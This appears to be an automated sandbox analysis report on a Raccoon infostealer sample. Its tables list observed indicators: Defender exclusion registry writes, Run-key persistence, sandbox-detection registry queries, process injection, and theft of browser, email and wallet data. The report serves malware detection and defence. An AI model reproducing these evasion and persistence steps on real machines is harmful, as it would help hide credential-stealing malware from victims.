raccoon | b244fb7a7b39c836a9629262eaa80865cfbaf37aaea1b1d4b880d8a864f865a4

System Information Discovery

Processes:

7ZI0ROMveurFDV8Aq7DVyS06.exeiaK6LGtP0xsu467Y5J6nvafj.execjG0Iam1Jj0cNNTd_SEVIp5b.exeARSOO0DIp2UugIvuwrSyM9oD.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7ZI0ROMveurFDV8Aq7DVyS06.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	iaK6LGtP0xsu467Y5J6nvafj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	iaK6LGtP0xsu467Y5J6nvafj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cjG0Iam1Jj0cNNTd_SEVIp5b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cjG0Iam1Jj0cNNTd_SEVIp5b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ARSOO0DIp2UugIvuwrSyM9oD.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ARSOO0DIp2UugIvuwrSyM9oD.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7ZI0ROMveurFDV8Aq7DVyS06.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

jingzhang.exeXegysukinae.exeBugyponoku.exeFikumigaena.exeTuvuduloxa.exearnatic_3.exearnatic_6.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	jingzhang.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Xegysukinae.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Bugyponoku.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Fikumigaena.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Tuvuduloxa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	arnatic_3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	arnatic_6.exe

Loads dropped DLL 64 IoCs

Processes:

setup_install.exerUNdlL32.eXearnatic_2.exearnatic_1.exeaq3T5oYFV8GDNuh6ZK8xkEpC.exechrome.exeMrGh6bEH0L0a.exexe3VggU3QswqnlgTx1tHoeRE.exerUNdlL32.eXerundll32.exe25D.exe4590.exe3745.exeDFFC.exerundll32.exerundll32.exelighteningplayer-cache-gen.exe

pid	process
3672	setup_install.exe
3672	setup_install.exe
3672	setup_install.exe
3672	setup_install.exe
3672	setup_install.exe
3172	rUNdlL32.eXe
1252	arnatic_2.exe
2164	arnatic_1.exe
2164	arnatic_1.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
8	chrome.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
5480	MrGh6bEH0L0a.exe
4192	xe3VggU3QswqnlgTx1tHoeRE.exe
4192	xe3VggU3QswqnlgTx1tHoeRE.exe
5788	rUNdlL32.eXe
6044	rundll32.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
3936	25D.exe
3936	25D.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
5844	4590.exe
5292	3745.exe
5292	3745.exe
5292	3745.exe
5292	3745.exe
5292	3745.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
6656	DFFC.exe
6656	DFFC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
5308	rundll32.exe
6988	rundll32.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
4396	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe
5500	lighteningplayer-cache-gen.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Documents\cjG0Iam1Jj0cNNTd_SEVIp5b.exe	themida
C:\Users\Admin\Documents\cjG0Iam1Jj0cNNTd_SEVIp5b.exe	themida
C:\Users\Admin\Documents\iaK6LGtP0xsu467Y5J6nvafj.exe	themida
C:\Users\Admin\Documents\iaK6LGtP0xsu467Y5J6nvafj.exe	themida

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

Processes:

rundll32.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\TEMP\ = "0"	rundll32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QRIvBFx = "0"	rundll32.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

1100866.exeèeèrgegdè_éçè_)))_.exe_____________bob.exe12(((((.exeConhost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	1100866.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xaecylolunae.exe\""	èeèrgegdè_éçè_)))_.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Tesaetonaexa.exe\""	_____________bob.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Pefefariny.exe\""	12(((((.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Sidebar\\Daewixaeruli.exe\""	Conhost.exe

Checks for any installed AV software in registry 1 TTPs 5 IoCs

Security Software Discovery

T1063

Processes:

Conhost.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab	Conhost.exe
Key opened	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab	powershell.exe
Key opened	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 7 IoCs

evasion trojan

System Information Discovery

Processes:

7ZI0ROMveurFDV8Aq7DVyS06.exeiaK6LGtP0xsu467Y5J6nvafj.exeBrowzar.exemd8_8eus.exenote8876.execjG0Iam1Jj0cNNTd_SEVIp5b.exeARSOO0DIp2UugIvuwrSyM9oD.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7ZI0ROMveurFDV8Aq7DVyS06.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iaK6LGtP0xsu467Y5J6nvafj.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Browzar.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md8_8eus.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	note8876.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cjG0Iam1Jj0cNNTd_SEVIp5b.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ARSOO0DIp2UugIvuwrSyM9oD.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 24 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
1167	ipinfo.io
56	ipinfo.io
453	ipinfo.io
523	ip-api.com
1103	checkip.dyndns.org
1105	ipinfo.io
1162	ipinfo.io
1165	checkip.dyndns.org
12	ip-api.com
456	ipinfo.io
619	ipinfo.io
626	ipinfo.io
1110	ipinfo.io
624	ipinfo.io
625	ipinfo.io
1114	ipinfo.io
1161	ipinfo.io
1204	ipinfo.io
1212	ipinfo.io
57	ipinfo.io
145	checkip.amazonaws.com
547	checkip.amazonaws.com
1097	ipinfo.io
1098	ipinfo.io

Drops file in System32 directory 32 IoCs

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exesvchost.exesvchost.exerundll32.exeConhost.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent E2C9EB35A2E84C34	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\QRIvBFx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent DF0B9C39A7969DE8	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\Videocard Service	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Conhost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy	Conhost.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Conhost.exe
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	Conhost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 50E0C83ED140FE88	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

cjG0Iam1Jj0cNNTd_SEVIp5b.exeARSOO0DIp2UugIvuwrSyM9oD.exe7ZI0ROMveurFDV8Aq7DVyS06.exeiaK6LGtP0xsu467Y5J6nvafj.exe

pid process

1128 cjG0Iam1Jj0cNNTd_SEVIp5b.exe
2144 ARSOO0DIp2UugIvuwrSyM9oD.exe
4140 7ZI0ROMveurFDV8Aq7DVyS06.exe
4792 iaK6LGtP0xsu467Y5J6nvafj.exe

pid	process
1128	cjG0Iam1Jj0cNNTd_SEVIp5b.exe
2144	ARSOO0DIp2UugIvuwrSyM9oD.exe
4140	7ZI0ROMveurFDV8Aq7DVyS06.exe
4792	iaK6LGtP0xsu467Y5J6nvafj.exe

Suspicious use of SetThreadContext 17 IoCs

Processes:

arnatic_7.exesvchost.exexLrZ7sMbOcUYQ6ZyqN_bIeZe.exen_XvoC0lA5U4xLfvwMUQ9ivc.exe1YsRDMFL5gbGtNm7s1bVicwX.exeqeWffXXPdL7IgtmXJGM3uvPh.exeDHL4Bb1YNR_LuTP87OTPpPEl.exe_eaNdnN9tnNRXIFKGG2yF0fp.exeMrGh6bEH0L0a.execmd.execompattelrunner.exejdrbfsftoolspab1.exetoolspab1.exejfiag3g_gg.exesvchost.exewirbfsf

description	pid	process	target process
PID 3804 set thread context of 208	3804	arnatic_7.exe	arnatic_7.exe
PID 3900 set thread context of 3872	3900	svchost.exe	svchost.exe
PID 4304 set thread context of 4636	4304	xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe	xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe
PID 4744 set thread context of 4960	4744	n_XvoC0lA5U4xLfvwMUQ9ivc.exe	n_XvoC0lA5U4xLfvwMUQ9ivc.exe
PID 2088 set thread context of 4100	2088	1YsRDMFL5gbGtNm7s1bVicwX.exe	1YsRDMFL5gbGtNm7s1bVicwX.exe
PID 4572 set thread context of 5004	4572	qeWffXXPdL7IgtmXJGM3uvPh.exe	qeWffXXPdL7IgtmXJGM3uvPh.exe
PID 2060 set thread context of 4224	2060	DHL4Bb1YNR_LuTP87OTPpPEl.exe	DHL4Bb1YNR_LuTP87OTPpPEl.exe
PID 4928 set thread context of 5480	4928	_eaNdnN9tnNRXIFKGG2yF0fp.exe	MrGh6bEH0L0a.exe
PID 412 set thread context of 5480	412	MrGh6bEH0L0a.exe	MrGh6bEH0L0a.exe
PID 6576 set thread context of 3696	6576	cmd.exe	svchost.exe
PID 8276 set thread context of 8268	8276	compattelrunner.exe	toolspab1.exe
PID 8900 set thread context of 8356	8900	jdrbfsf	toolspab1.exe
PID 8832 set thread context of 3280	8832	toolspab1.exe	toolspab1.exe
PID 8764 set thread context of 7128	8764	toolspab1.exe	toolspab1.exe
PID 5084 set thread context of 6464	5084	jfiag3g_gg.exe	wirbfsf
PID 3696 set thread context of 7244	3696	svchost.exe	svchost.exe
PID 8800 set thread context of 5080	8800	wirbfsf	wirbfsf

Drops file in Program Files directory 64 IoCs

Processes:

SunLabsPlayer.exeLibraVPN.exeaq3T5oYFV8GDNuh6ZK8xkEpC.exeSunLabsPlayer.exeSunLabsPlayer.exelibravpn_setup.tmpSunLabsPlayer.exedata_load.exepowershell.exe12(((((.exedata_load.exedata_load.exeSetup.exeprolab.tmpultramediaburner.tmppowershell.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\bundle-app.js	LibraVPN.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\log_out.png	LibraVPN.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\64\openvpn\is-CNSEQ.tmp	libravpn_setup.tmp
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\data.dll	data_load.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\is-A8Q5H.tmp	libravpn_setup.tmp
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\on_btn.png	LibraVPN.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\my.png	LibraVPN.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\64\openvpn\is-BHG86.tmp	libravpn_setup.tmp
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\bw.png	LibraVPN.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\equalizer_window.html	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\dk.png	LibraVPN.exe
File opened for modification	C:\Program Files\temp_files\bckf.fon	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
File opened for modification	C:\Program Files (x86)\QRIvBFx	powershell.exe
File created	C:\Program Files (x86)\Reference Assemblies\Pefefariny.exe	12(((((.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\small-star-icon.png	LibraVPN.exe
File opened for modification	C:\Program Files\temp_files\QRIvBFx.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\se.png	LibraVPN.exe
File created	C:\Program Files\temp_files\QRIvBFx.dll	data_load.exe
File created	C:\Program Files\temp_files\cache.dat	data_load.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\temp_files	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll	aq3T5oYFV8GDNuh6ZK8xkEpC.exe
File created	C:\Program Files\Common Files\KLOTBEAUID\prolab.exe.config	12(((((.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlccore.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\account.png	LibraVPN.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\SourceGrid2.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-DRRC3.tmp	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_browse.html	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\QRIvBFx\cache.dat	powershell.exe

Drops file in Windows directory 6 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 14 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2184	5092	WerFault.exe	mqnMtgWvbwILOMZrKc6CsUOn.exe
4364	5092	WerFault.exe	mqnMtgWvbwILOMZrKc6CsUOn.exe
4104	5092	WerFault.exe	mqnMtgWvbwILOMZrKc6CsUOn.exe
4752	5092	WerFault.exe	mqnMtgWvbwILOMZrKc6CsUOn.exe
5612	5092	WerFault.exe	mqnMtgWvbwILOMZrKc6CsUOn.exe
5804	5092	WerFault.exe	mqnMtgWvbwILOMZrKc6CsUOn.exe
6236	3876	WerFault.exe	Browzar.exe
6916	5072	WerFault.exe	ypYDB0vdoDVBp7hsRzifyKGQ.exe
6028	4952	WerFault.exe	MicrosoftEdgeCP.exe
5440	5644	WerFault.exe	MicrosoftEdgeCP.exe
5220	9204	WerFault.exe	rundll32.exe
6528	6796	WerFault.exe	LibraVPN.exe
9088	4984	WerFault.exe	MicrosoftEdgeCP.exe
6732	3928	WerFault.exe	MicrosoftEdgeCP.exe

Checks SCSI registry key(s) 3 TTPs 33 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

4590.exetoolspab1.exejdrbfsfwirbfsfjdrbfsfarnatic_2.exetoolspab1.exersrbfsfwirbfsfrsrbfsfMrGh6bEH0L0a.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	4590.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jdrbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wirbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jdrbfsf
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jdrbfsf
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsrbfsf
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wirbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsrbfsf
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wirbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MrGh6bEH0L0a.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jdrbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wirbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsrbfsf
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MrGh6bEH0L0a.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MrGh6bEH0L0a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wirbfsf
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsrbfsf
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	wirbfsf
